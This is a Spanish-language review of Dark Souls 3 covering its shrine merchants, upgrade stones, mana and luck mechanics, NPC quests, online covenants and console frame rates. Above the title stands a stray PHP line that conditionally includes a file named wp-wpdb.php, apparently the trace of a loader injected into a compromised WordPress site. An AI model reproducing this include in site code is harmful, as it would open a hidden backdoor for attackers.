if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Dark Souls 3 – La Fortaleza de LeChuck

Análisis Dark Souls 3

Todo principio tiene un final, y tras cientos de horas de sufrimiento repartidas en varios juegos, Dark Souls 3 pone punto y final a la obra de Hidetaka Miyazaki que dio comienzo allá por el 2011 con la primera entrega de la saga, y a decir verdad, esta última entrega ha sido una buena forma de decir adiós.

Dark Souls 3 es una buena mezcla de aquello que funcionaba en los anteriores Dark Souls, quitando lo que no, y mezclándolo con ciertos toques de Demon’s Souls y Bloodborne para refinar la fórmula y ofrecer una nueva jugabilidad que mejora con creces la experiencia.

Dark Souls 3

SOY NUEVO EN LA SAGA, ¿DEBERÍA EMPEZAR POR EL TERCERO?

No hay ningún problema, realmente la única conexión que hay entre los tres títulos de la saga es el Lore, por lo demás no guardan mucha relación ya que From Software ha apostado más por una experiencia de juego individual que por una buena narración en conjunto, vas a poder disfrutar de la “experiencia Dark Souls” juegues al juego que juegues.

Personalmente recomendaría que se empezase por el primer Dark Souls ya que es un juego sobresaliente a pesar de cómo ha envejecido, además, así te percatarás de la grandísima cantidad de guiños y referencias que tiene esta tercera entrega con respecto al primer juego. Aquellos que lo hayan jugado antes que este disfrutarán de los escenarios y de ciertos enemigos a otro nivel.

Pero, ¿qué te vas a encontrar si es tu primer juego? No es ningún secreto que la saga Souls es bien conocida por su elevada dificultad y la curiosa forma que tiene de enseñar al jugador cómo funcionan sus controles, pero en realidad nos encontramos ante un excelente juego de rol con grandes dosis de acción que tiene una cantidad inmensa de opciones y posibilidades que se adaptan perfectamente a tu forma de jugar.

Aunque de primeras pueda parecer un juego casi imposible, hay que remarcar que los Souls siempre han jugado más con tu paciencia que con la dificultad de los enemigos en sí, cometerás errores, muchos, y estos los pagarás caro, pero si le dedicas tiempo a la exploración para encontrar los atajos y las ayudas, te tomas el juego con calma y, sobretodo, aprendes de cada muerte. Te aseguro que vas a disfrutarlo mucho ya que la sensación de satisfacción al derrotar a un jefe que se nos resiste mucho no tiene precio. Y si por algún casual el juego se te hace especialmente difícil, esta saga tiene una gran comunidad que no dudará en ayudarte mediante su modo online, donde puedes invocar hasta 3 jugadores para que te ayuden, hay tantas formas de disfrutar del juego como formas de morir.

Dark Souls 3

EL REINO DE LOTHRIC

Esta tercera entrega se sitúa varias eras después del Dark Souls 2, y debido a la cantidad de veces que se ha ido enlazando el fuego, este ha ido perdiendo su intensidad poco a poco hasta el punto de que no basta con que el individuo más poderoso de esta era se sacrifique, se precisan de 5 almas de antiguos señores de la ceniza para poder enlazar el fuego, y eso no augura nada bueno.

El juego nos transporta al reino de Lothric, el lugar donde convergen todas las tierras de los antiguos señores de la ceniza y lo que queda de sus reinos, es un paraje bastante extenso y con una gran cantidad de escenarios con diferentes estéticas, y si, en esta ocasión el entramado del mapa tiene mucho sentido y los escenarios están bien conectados dejando a un lado el desastroso diseño del Dark Souls 2 pero sin llegar a estar tan bien diseñado como el del 1.

Una de las funciones que se mantiene del Dark Souls 2 es la posibilidad de teletransportarnos a cada hoguera que activemos desde el principio del juego, facilitando así el transporte para no hacerlo tan pesado a los jugadores que no quieren recorrerse medio mapa para avanzar. Aparte de un buen diseño en general, cada escenario cuenta con varios atajos escondidos que ayudan mucho al jugador a no frustrarse y poder llegar al jefe de la zona de una pieza, de esta forma el juego nos anima a explorar bien los mapas para no solo encontrar estos atajos, si no las armas, armaduras, anillos y hechizos que están escondidos por toda la zona y que pueden sernos muy útiles en un futuro.

Dark Souls 3

SANTUARIO DE ENLACE DE FUEGO

Como ya hemos visto en los anteriores Dark Souls, este también cuenta con un punto de reunión donde poder subir de nivel, comerciar o simplemente charlar con varios npcs que harán un alto en el camino de vez en cuando. Aquellos veteranos de la saga reconocerán en seguida este nuevo diseño del santuario de enlace de fuego que se asemeja mucho al nexo que vimos en el Demon’s Souls solo que con varios detalles diferentes.

Nada más empezar tendremos a varios personajes esperándonos en el santuario y conforme vayamos avanzando en el juego podremos ir reclutando nuevos mercaderes centrados en hechizos, milagros y piromancias y alguno que otro que nos venderá una gran cantidad de objetos consumibles que nos ayudaran bastante durante nuestra desventura por las tierras de Lothric.

Dark Souls 3

Uno de estos personajes es una anciana en silla de ruedas que será nuestra mercader principal, a pesar de que su catálogo de productos parezca escaso al principio podremos ampliarlo mediante las cenizas de otros npcs que no hayan tenido tanta suerte, estas cenizas se encuentras esparcidas por varios mapas y no estarán muy a la vista, aunque también podremos matar a cualquier npc y entregarle las cenizas que nos suelten, cada vez que le demos algo a esta “adorable” anciana ampliará su catálogo de productos, eso sí, intentad no matarla ya que es inmortal y encima en venganza duplicará los precios que ya de por si son elevados.

Además de estas cenizas, cada vez que matemos a un jefe la anciana actualizará su catálogo con el set de armadura de ese jefe por si nos interesa alguna cualidad del set o simplemente nos encanta su diseño, y como novedad podremos venderle los objetos que tengamos duplicados o no queramos tener en nuestro inventario por una cantidad ridícula de almas, menos da una piedra.

La guardiana de fuego es una de los personajes más importantes del juego, ella se encargará única y exclusivamente de subirnos niveles cada vez que tengamos un buen puñado de almas, bastará con teletransportarse hasta el santuario y hablar con ella para subir los niveles que podamos.

Otro de los personajes que estará presente en todo nuestro recorrido es el herrero, un viejo conocido que nos ayudará a reforzar nuestras armas hasta +10 mediante los diferentes tipos de titanita que iremos encontrando en cadáveres o que nos irán soltando los enemigos, además, también podrá imbuirlas mediante un tipo especial de piedras, con un gran abanico de elementos y mejoras para que nuestra arma se adapte mejor a nuestro estilo de combate. Aunque hay ciertas armas especiales como las de los jefes o de ciertos enemigos importantes que no se mejoran de forma normal, estas armas solo se podrán mejorar hasta +5 con un tipo de titanita especial y no se les podrá mejorar con ningún tipo de piedra, pero a pesar de estas limitaciones estas armas son increíblemente poderosas y suplen con creces estas pequeñas carencias.

Por un lado tenemos las piedras de tipo elemental de gran nivel como magia, electricidad y caos que escalan mediante varios atributos, algo perfecto si eres mago, piromante o clérigo, además de estos elementos hay otros como fuego y oscuridad que a pesar de que le dan un plus importante al arma no escalan con ningún atributo. Por ultimo, hay otras piedras que añaden daño de hemorragia o veneno al arma por si preferimos desgastar poco a poco a nuestro rival.

Dark Souls 3

Por otro lado, tenemos las piedras mundanas que mejoran nuestra arma sin añadirle ningún ataque especial, por ejemplo, la piedra afilada mejorará la forma en la que escala un arma mediante el atributo de la destreza mientras que la pesada hará lo mismo con la fuerza, este tipo de piedras son perfectas si queremos ir al extremo con una build centrada solo en el combate.

En el Santuario de Enlace de Fuego también estarán los tronos de los antiguos reyes de la ceniza que hay que vencer, y en uno de ellos estará sentado un pequeño rey que al darle un objeto especial que conseguimos derrotando a un jefe opcional podrá transmutar estas almas en diferentes tipos de magias, armas y equipo muy a tener en cuenta ya que entre ellos se encuentran los mejores objetos del juego.

JUGABILIDAD Y NUEVAS MECÁNICAS

Dark Souls 3 ha tenido muchos cambios en su jugabilidad y estructura debido al mal hacer que hubo con el 2, uno de los añadidos más interesantes es sin duda alguna la barra de maná que hizo su aparición en Demon’s Souls y que desapareció en el primer Dark Souls, esta barra nos permite usar habilidades mágicas y poderes de armas de forma más razonable para que el jugador no abuse de la magia como ya pasaba en los anteriores títulos.

Aunque el limitar los usos de los hechizos mediante una barra en vez de centrarse en los usos individuales pueda parecer un desequilibrio de poder para las builds que usen magia, piromancias, milagros o hechizos, en realidad ayudan a que el jugador no se centre solo en estos elementos y pruebe más estilos de combate, haciendo que el juego sea más activo en vez de estar desde lejos lanzando hechizos.

Así pues cada hechizo, piromancia o milagro tendrá un coste en PC determinado que se irá restando de la barra de maná con cada uso. El tamaño de esta barra dependerá de nuestro atributo de aprendizaje, cuanto mayor sea este atributo mayor será nuestra barra y tendremos más huecos de hechizos disponibles. Junto con esta nueva barra de maná le ha seguido un nuevo frasco de estus especialmente diseñado para que pueda recargar únicamente esta barra, es el estus de ceniza.

Como ya pasaba en Dark Souls 2, ahora la cantidad de frascos de estus normales y de ceniza que tendremos depende de los fragmentos de estus que encontremos, hay unos 11 fragmentos que junto con los iniciales nos pueden dar un total de 15 frascos, estos fragmentos están escondidos como objetos en todos los escenarios del juego y habrá que explorar a fondo para poder encontrarlos todos. Mediante el herrero podremos elegir qué cantidad de frascos de estus normales y de ceniza queremos tener, podremos cambiar este número cada vez que queramos en función de las necesidades que tengamos sin coste alguno.

Otro de los objetos que mejoran nuestros frascos de estus serán las cenizas de hueso que al quemarlas en la hoguera del santuario de enlace de fuego modificarán la cantidad de vida o maná que nos recupera cada frasco, hay un total de 10 esparcidas por todo Lothric y son realmente útiles al final de nuestra aventura.

Se ha añadido un nuevo atributo, la suerte, ese atributo se ha planteado como ya se vio en el Demon´s Souls solo que con un par de cambios, por un lado cuanta más suerte tengamos mayor será nuestro índice de descubrimiento de objetos, es decir, la probabilidad de que un enemigo nos suelte un objeto, con un índice muy alto podremos conseguir más fácilmente objetos raros y especiales, además de por atributo hay varios objetos que aumentan este índice de descubrimiento como el ya conocido anillo de la serpiente dorada o el símbolo de la avaricia. Además de para descubrir objetos, el atributo de suerte afecta directamente a la potencia del daño por veneno y la hemorragia, por poner un ejemplo, si con 12 de suerte necesitamos 4 ataques para que el enemigo sufra de hemorragia con 50 solo necesitaremos 2, además de que el daño causado será mayor.

Pero la utilidad de este nuevo atributo no acaba aquí, como ya he comentado arriba en la sección del herrero, ahora hay nuevas piedras para imbuir armas, una de ellas es la gema hueca que hará que nuestra arma escale también con la suerte, y aunque a priori no parezca nada del otro mundo hay que comentar que este daño extra no tiene límite de escalada ya que no depende de los atributos de combate habituales y con niveles altos cualquier arma puede hacer un gran daño extra, esto si lo combinamos con alguna arma que no pierda la hemorragia al imbuirle esta piedra hará que seamos terriblemente letales sobre todo contra jefes y en el pvp, ahora la suerte es un atributo muy a tener en cuenta a la hora de hacernos builds de combate puro.

Dark Souls 3

El combate es algo que ha mejorado con creces, se ha cogido parte de la esencia del combate del Bloodborne para aumentar el dinamismo y la velocidad en general, esto hace que los combates sean más intensos y frenéticos que los vistos en los anteriores Souls, por otra parte se han retocado los diferentes estilos de lucha y ahora sí que hay una diferencia notable entre usar armas rápidas y pesadas, las armas ahora tienen una forma de blandirse muy distinta y esto afecta a la cantidad de ataques y su continuidad que podemos realizar antes de que la barra de aguante llegue a 0.

En los anteriores Souls si se llevaba mucho equipo, la acción de rodar y otras importantes se hacía cada vez más lenta y pesada en función de nuestro nivel de peso hasta el punto de que simplemente nos tirábamos al suelo y nos incorporábamos, pues en Dark Souls 3 la voltereta ágil se mantiene hasta que lleguemos al 70% de la capacidad de nuestro peso, a partir de ahí la voltereta será muy pesada y si por alguna razón superamos el 100% del peso no podremos rodar. Además de a la voltereta, el peso extra afecta al gasto que haremos de la barra de aguante, a la forma que tendremos de movernos y sobre todo, a nuestra velocidad, es importante mantener un buen nivel de peso para poder esquivar todos los golpes posibles a no ser que nos enfundemos en la armadura más pesada que haya y tiremos de escudo para avanzar.

Otro cambio importante en el sistema de armas son las weapons arts, estas habilidades nos dan movimientos extra que consumen la barra de maná y que sirven para realizar ataques especiales, por poner un ejemplo, las dagas ahora tienen como movimiento especial la posibilidad de realizar un avance muy rápido para poder posicionarse detrás del enemigo con mayor facilidad, en el caso de los catalizadores de mago ahora podemos imbuir de magia el bastón durante un breve periodo de tiempo para que los hechizos hagan más daño, en general estos movimientos no acaban de convencer demasiado ya que salvo excepciones solo son útiles en determinadas circunstancias, aunque no está de más que se hayan incluido ya que bien usadas pueden marcar la diferencia entre la vida y la muerte.

Además de las armas, los escudos también han recibido varios cambios importantes, ahora estos se catalogan en 3 tipos diferentes, por un lado tenemos los ligeros que como movimiento especial nos permitirán hacer parrys, por otro lado tenemos los pesados que nos permitirán hacer una pequeña carga hacia adelante para golpear y desequilibrar al enemigo, y para acabar tenemos los de especialista que nos permitirán realizar las weapons arts sin tener que desequipar el escudo.

Dark Souls 3

NPCS Y SU IMPORTANCIA EN EL JUEGO

Los npcs secundarios siempre han tenido un pequeño papel dentro de nuestras aventuras en toda la saga, a pesar de que muchas son historias muy elaboradas no han afectado al desarrollo de la historia de forma directa, y es aquí donde Dark Souls 3 ha acertado, poniéndonos en situación. En los anteriores juegos nos dedicábamos a derrotar jefes para poder obtener un inmenso poder y así poder enlazar o no el fuego, bueno, en el Dark Souls 2 solo había una elección posible, pero al margen de eso los npcs que nos encontrábamos solo nos ayudaban en momentos puntuales y la forma de realizar sus quest solo era la de hablar con ellos de vez en cuando.

En Dark Souls 3 a pesar de que tenemos el mismo objetivo, el final al que podemos optar depende en parte de varios npcs que aparecerán de vez en cuando en diferentes localizaciones de Lothric, si ayudamos a estos personajes o completamos sus quest de cierta forma, estos aparecerán en determinados momentos del juego y cambiarán la forma de hacer ciertas cosas del modo historia, hasta el punto de que si el que no debe muere podremos acceder a un final o a otro, esto le da mucha más profundidad al juego ya que ahora no eres tu solo contra el mundo, hay muchas personas y cada una tiene un objetivo concreto que entra en conflicto o no con tus planes.

Además de la habitual forma de invocarlos para que estos te ayuden a derrotar un jefe o a limpiar la zona, ahora se ha añadido la posibilidad de que estos te puedan invocar para que les ayudes tú a ellos con determinados jefes, algo muy interesante en términos jugables, por otra parte ahora estos npcs, tanto amigos como hostiles, tendrán la posibilidad de curarse mediante los frascos de estus, algo muy útil cuando pedimos ayuda y queremos que nuestro aliado no se muera a la primera de cambio.

Dark Souls 3

EL NUEVO MODO ONLINE

Uno de los aspectos más interesantes de los Dark Souls es sin duda su aspecto online por varios motivos, el primero son las ayudas de otros jugadores mediante los mensajes de saponita naranja que nos pueden ayudar o dificultar la forma de descubrir nuevas áreas, secretos y objetos ocultos a simple vista, eso y la enorme cantidad de mensajes de “Intenta saltar” que nos conducen a una muerte segura son una de las grandes experiencias del juego.

El modo cooperativo es otro de los aspectos más importantes del juego, ya que invocar espectros aliados nos alivia un poco la tensión de tener que derrotar a jefes que se nos resisten y completar zonas sin acabar tirando el mando por la ventana. Los jugadores veteranos de la saga sabrán lo difícil que era jugar en cooperativo con un amigo, por un lado estaba la pequeña diferencia de niveles que tenía que haber entre ambos para poder coincidir y por otra parte había que esconder la marca de invocación y esperar a que el servidor pusiese en el mismo nodo a ambos jugadores para coincidir, y si tras todo eso tenías suerte de invocar a tu amigo, había que intentar no morir para no empezar la odisea de invocarlo otra vez.

En Dark Souls 3 se han hecho bien las cosas con el multijugador, por un lado han facilitado enormemente la posibilidad de jugar con un amigo mediante el sistema de contraseñas que ya incluyeron en el Bloodborne, solo que esta vez se han asegurado de que coincidamos con nuestros amigos quitando el límite de niveles mediante este método, aunque en el caso de que haya una diferencia de niveles bastante notable entre el host y el jugador invocado se igualará el daño y la defensa del invocado hasta equipararse a la del host, esto se ha hecho para que estando en nivel muy bajo no puedas invocar a alguien 50 niveles por encima y que el trayecto sea un paseo, aquí o se sufre o nada.

Dark Souls 3

Si queremos invocar espectros de cualquier parte del mundo la diferencia de niveles dependerá del pacto en el que estemos y en función de cual sea la diferencia puede llegar a ser de hasta 30 niveles de margen, aunque para evitar invocar a alguien más débil que tú se tendrá en cuenta la mejora del arma, es decir, que si tenemos una espada ancha a +6 los servidores priorizarán a la gente que tenga su arma a +4 o +8, y si no se ampliará el margen para que puedas invocar a alguien siempre que lo necesites.

Aunque ahora invocar a alguien tiene un lado negativo, por cada jugador extra que invoquemos el jefe de la zona duplicará su vida y resistencia para que el combate siga siendo desafiante, esto implica que si invocamos a 2 jugadores el jefe de zona tendrá entre 3 y 4 veces más vida que yendo solo, lo mejor de todo es que si los invocados mueren el jefe sigue manteniendo esos stats elevados y al final nos enfrentamos a un jefe muchísimo más fuerte, y eso a veces no compensa demasiado salvo por el hecho de que el jefe no se centra solamente en ti y hay un mayor margen para poder golpear sin ser golpeado.

Por otro lado los pactos ahora tienen un papel más importante, además de la diferencia de niveles que ofrece cada uno para invocar y ser invocado, cada pacto cuenta con sus propias reglas y de todos los que hay la gran mayoría están centrados en el multijugador, tenemos el ya famoso pacto de la luz solar que nos permite ayudar a otros jugadores de forma más sencilla, el nuevo pacto de los apiladores nos permitirán confundir y asesinar a otros jugadores si tenemos cierto anillo que nos vende la anciana haciendo que las invasiones sean mucho más interesantes o los de la senda azul y caballeros azules que nos ayudarán a afrontar las invasiones entre otros muchos pactos, si quieres descubrirlos todos más te vale explorar bien, ya que las recompensas de algunos son bastante jugosas.

El tema de los niveles dentro de cada pacto se mantiene, solo que en esta ocasión en vez de darle humanidades habrá que dar unos objetos exclusivos de cada pacto que se nos darán como recompensa al completar el objetivo de dicho pacto, por ejemplo, el objetivo de los apiladores es la de matar al host de otro mundo, pues en el caso de conseguirlo se nos recompensará con unos grilletes de hueso, cuando tengamos 10 subiremos al nivel 1 y cuando tengamos 20 más subiremos al nivel 2, al llegar a cada nivel se nos recompensará con un poder o arma exclusiva, olvidaros de convertiros en pecadores al cambiaros de pacto como pasaba anteriormente, aquí te puedes cambiar de pacto siempre que quieras sin ninguna consecuencia, así que disfruta de esta faceta del juego que bien merece la pena explorarla.

Dark Souls 3

APARTADO TÉCNICO

A pesar de que From Software nunca ha sido pionera en gráficos, hay que decir que dentro de la saga es el juego que mejor luce de todos, y aunque el modelado y algunas texturas no sean nada del otro mundo, las partículas y los efectos de luz suplen por completo estos pequeños fallos y el resultado es muy agradable a la vista.

Aunque hay un problema gráfico que si merece ser mencionado, normalmente no suelo hacer comparativas entre plataformas en mis análisis ya que cada uno sabe un poco de que peca cada plataforma, pero en esta ocasión tengo que hacer un pequeño apunte que afecta a la jugabilidad, que al fin y al cabo es el punto fuerte del juego.

No voy a entrar en temas de resoluciones ya que no es algo importante en esta ocasión, lo importante es que la versión de las consolas va a unos 30 fps mientras que en el Pc el juego va a unos 60 fps con bajadas puntuales importantes en ambas plataformas, y eso es algo que me parece importante a la hora de decidir dónde comprarlo, vengo del Scholar of the First Sin donde el Dark Souls 2 en consolas iba a unos fluidos 60 fps y eso hacía que la jugabilidad mejorase bastante, al parecer este cambio gráfico hace que las consolas no sean capaces de mover el juego con tanta fluidez.

Que sí, que esto a muchos les puede parecer una tontería ya que es la misma copla de siempre, pero estando en un juego donde cualquier cosa te hace daño es importante que haya una fluidez para poder reaccionar a tiempo, y no voy a entrar en una absurda guerra de plataformas ya que hay que recordar que los de From Software llevan haciendo esto desde el primer juego, hola ciudad infestada, si, hablo de ti, y que solo espero que esto se pueda arreglar en futuros parches, no pido los 60 fps en consola, pero al menos que esos 30pfs sean estables.

Dejando los gráficos a un lado, vamos a ponernos con otro aspecto importante, su banda sonora, una de las cosas que se viene repitiendo desde el primer título es la ausencia de música dentro de los escenarios para dar una mayor sensación de soledad, por un lado está bien ya que podemos escuchar todos y cada uno de los sonidos que nos rodean, el oír un rugido a tiempo nos puede evitar muchos problemas, pero por otro es una pena que no haya una mejor ambientación.

Aunque el juego sí que tiene banda sonora, y es maravillosa, las pistas solo las podremos escuchar cuando estemos luchando contra jefes y ahí harán que los combates sean mucho más espectaculares, mientras que en el santuario de enlace de fuego la música será constante e irá cambiando conforme nos vayamos acercando al final del juego.

Dark Souls 3

CONCLUSIONES

Dark Souls 3 es un gran juego sin ninguna duda, nos encontramos con un título bastante largo que oscila entre las 30 horas en función de las veces que mueras o de la cantidad de ayudas que solicites durante tu partida, y entre las quest secundarias, los enemigos opcionales, las zonas secretas y el multijugador tanto cooperativo como competitivo se puede alargar fácilmente hasta las 50 o 60 horas sin contar la posibilidad del NG+ donde hay nuevos enemigos y estos en general son más duros, pero las recompensas son mucho más interesantes.

Tras haber hecho un maratón previo para entrar con ganas a esta última entrega, he podido apreciar los grandes cambios realizados que han mejorado con creces la experiencia en general, ¿Es un juego de 10? No, ya que dentro de la saga no es el mejor y encima aún sigue teniendo varios fallos que aunque no empañen la experiencia siguen estando ahí, pero las sensaciones que he tenido con este juego siendo un gran amante de la saga Souls han sido muy satisfactorias y hacen que para mí sea uno de los grandes juegos de este 2016.